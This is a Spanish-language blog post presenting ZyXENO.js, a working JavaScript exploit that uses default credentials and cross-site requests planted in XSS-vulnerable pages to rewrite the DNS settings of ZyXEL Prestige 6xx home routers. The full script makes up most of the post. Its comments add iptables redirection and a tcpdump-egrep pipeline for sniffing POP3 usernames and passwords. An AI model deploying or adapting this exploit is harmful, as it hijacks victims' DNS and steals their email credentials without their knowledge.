ZyXENO: forzarle un DNS al ZyXEL P6xx

La gente no se toma en serio el peligro que significa un password por default. A continuación les presento ZyXENO.js, es un script que forza una configuración al ZyXEL Prestige 6xx, haciendo que los queries DNS se hagan a donde tú elijas. Aunque esto es posible con muchos otros fabricantes... Elegí este en específico porque tiende a ser el que normalmente se le suple a los clientes (víctimas) del monopólico ISP de .DO

De más está decir todo lo que esto implica a nivel de seguridad..., pero la gente tiene una falsa percepción de seguridad cuando las cosas no se ven por la WAN


Si tienes un ZyXEL y quieres probarlo... clickea aqui a tu propio riesgo y luego chekea tu ZyXEL.

Ejemplificaremos el funcionamiento con lo siguiente:
La imagen más arriba (dale un click para agrandarla) muestra los elementos de la A a la E.

A) ZyXEL por default
B) H4x0r: este es quien plantara el script en alguna web, foro, o mensaje html de un social network, etc..., correra un DNS, sniffeará tráfico y redireccionará a las IP originales que intercepte en los diferentes casos.
C) DNS origina del ISP (en el caso de .do es 196.3.81.5 ). Este no sera alcanzado despues del ataque, si no que llegaran al punto B (h4x0r)
D) Mail Server a donde pretende llegar el punto A (dueño del ZyXEL) y a donde llegaremos con un port bounce o un forward luego de sniffear o cambiar los datos.
E) Este es el recipiente o depositorio del script. Basicamente cualquier pagina que permita ataques de XSS, Foros o Comunidades virtuales que permitan postear mensajes con contenido HTML, etc.... Esto debe ser visto por la víctima.

Sé libre de dejarme un comentario. Si tiene una crítica, algún bug en el código, duda, etc...

ZyXENO.js /*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\ ! ______ __ __ _____ _ _ _____ | | |___ / \ \ / /| ___| \ | | _ | ! ! / / _ _ \ V / | |__ | \| | | | | | | / / | | | |/ \ | __|| . ` | | | | ! ! ./ /__| |_| / /^\ \| |___| |\ \ \_/ / | | \_____/\__, \/ \/\____/\_| \_/\___/ ! ! __/ | por XenoMuta (2007) | | |___/ http://xenomuta.blogspot.com ! ! | \-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=/ El autor no es responsable del uso que usted de a esta herramienta, la cual ha sido diseñada para investigacion con fines educativos. Ok... resulta que el router ZyXEL Prestige 6XX DSL tiene un servicio especial... - DNS RELAY - :O !!!!!!!!!!!! Esto quiere decir que los que llega al UDP/53 del ZyXEL se re-envia a los DNS que indiques. Resulta que si le cambio la direccion IP a una de las interfaces del modem. para que sea el DNS default del ISP, los requests llegaran al Modem y del Modem al Relay en lugar del DNS original. Tomando en cuenta que la mayoria de los ISP no consideran educar al usuario final para cambiar sus passwords por por default... Proposito: Cambiar el DNS de un ZyXEL P6XX-XX DSL Router con password por default desde la internet. Ejemplo de uso: - Seteas un DNS en X.115.32.1 - apuntas pop.blabla.com a X.15.32.1 - haces redireccionas tu puerto 110 a la IP original de pop.blabla.com # iptables -t nat -I PREROUTING -p tcp --dport 110 -j DNAT --to-destination pop.blabla.com - a oler el cable! # tcpdump -nAs1024 dst port 110 2> | egrep -i "user|pass" > passwords.txt - Luego buscas una forma creativa de que el usuario vea este JS. No es dificil. Puedes postearle un mensaje en algun social network o en un foto que permita HTML tags... agregando un <script src="zyxeno.js"></script> SALUDOS: - al [Celcius], que me hizo coro durante el desarrollo de este PoC - a la gente de ZyXEL por hacer el mundo mas complicado... - a C0d3Tel por ser tan baratos.... */ var a=0,mente; var body=document.getElementsByTagName("body"); // Corpus HTML var img=new Image(); // Esta imagen servira para llevar el request GET // del CGI para modificar el DNS img.src=""; img.setAttribute("id","img"); // Su respectivo ID img.style.display="none"; // Soy Timido img.style.visibility="hidden"; // No me mires! body[0].appendChild(img); // Agrega la imagen invisible al cuerpo del HTML // Amalgama de Estupidez por default var default_user = "admin", default_pass = "1234", default_ip = "10.0.0.1", URL = "http://"+default_user+":"+default_pass+"@"+default_ip+"/Action?"; // Estos son los default del proveedor mas comun en mi pais (.DO) var DNS = new Array ("196.3.81.5","196.3.81.132"); // Tu DNS y el DNS backup por si el tuyo se cae, el usuario no se quede sin resolver nombres... // OJO: si por mala suerte se cae tu DNS... el ZyXEL no resolvera nombres y fulanito va a llamar // al ISP y bye bye operacion.... var TuDNS="10.0.0.201"; // El DNS que le pondras al ZyXel, aqui es donde entras en escena. function long_ip(short_ip) { // Expresar el IP como lo que es, un entero largo ( 32 bits ) var lip,i=lip=0,ip=short_ip.split('.'); for(i=3;i>-1;i--) lip+=(ip[3-i]*Math.pow(256,i)); return lip; } function dale_mambo(mambo) { a++; img.src=URL+mambo; // El request GET HTTP haciendole pensar al browser que es una imagen... // (soy vago y me ahorro codear en AJAX cloro ... ) // img.onError=cerebro(); // <= Esta forma es muy ineficiente var mente=setInterval("cerebro()",1000); return true; } function cerebro() { var ip; clearInterval(mente); switch(a) { case 0: dale_mambo("id=58&ex_param="+long_ip(DNS[a])); break; // REMUEVE LOS ESTUPIDOS DNS por DEFAULT case 1: dale_mambo("id=58&ex_param="+long_ip(DNS[a])); break; case 2: // Agrega tu DNS >;) ip=TuDNS.split('.'); dale_mambo("dns_status=1&id=57&"+ "dns_server_ip_1="+ip[0]+"&"+ "dns_server_ip_2="+ip[1]+"&"+ "dns_server_ip_3="+ip[2]+"&"+ "dns_server_ip_4="+ip[3]+"&cmdAdd=Add"); break; case 3: dale_mambo("dns_status=1&id=59"); break; // Habilita el Relay case 4: // Finalmente, haz que los requests al DNS 1 lleguen al Relay ip=DNS[0].split('.'); dale_mambo("chk_dhcp=1&ip_1=10&ip_2=0&ip_3=0&ip_4=1&mask_1=255&mask_2=0&mask_3=0&mask_4=0&"+ "usb_ip_1="+ip[0]+"&usb_ip_2="+ip[1]+"&usb_ip_3="+ip[2]+"&usb_ip_4="+ip[3]+ "&usb_mask_1=255&usb_mask_2=255&usb_mask_3=255&usb_mask_4=0&id=2"); break; default: break; } return true; } cerebro();